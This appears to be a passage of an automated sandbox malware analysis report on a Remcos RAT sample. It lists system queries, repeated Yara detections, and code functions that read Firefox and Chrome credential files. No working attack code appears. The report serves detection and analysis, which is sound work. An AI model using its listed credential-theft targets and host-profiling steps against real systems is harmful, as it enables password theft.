Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00431590 cpuid

17_2_00431590

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00404F28 GetLocalTime,CreateEventA,CreateThread,

17_2_00404F28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004451D0 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

17_2_004451D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00417E20 GetComputerNameExW,GetUserNameW,

17_2_00417E20

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: \key3.db		17_2_0040A1C4

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

17_2_0040A0A6

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
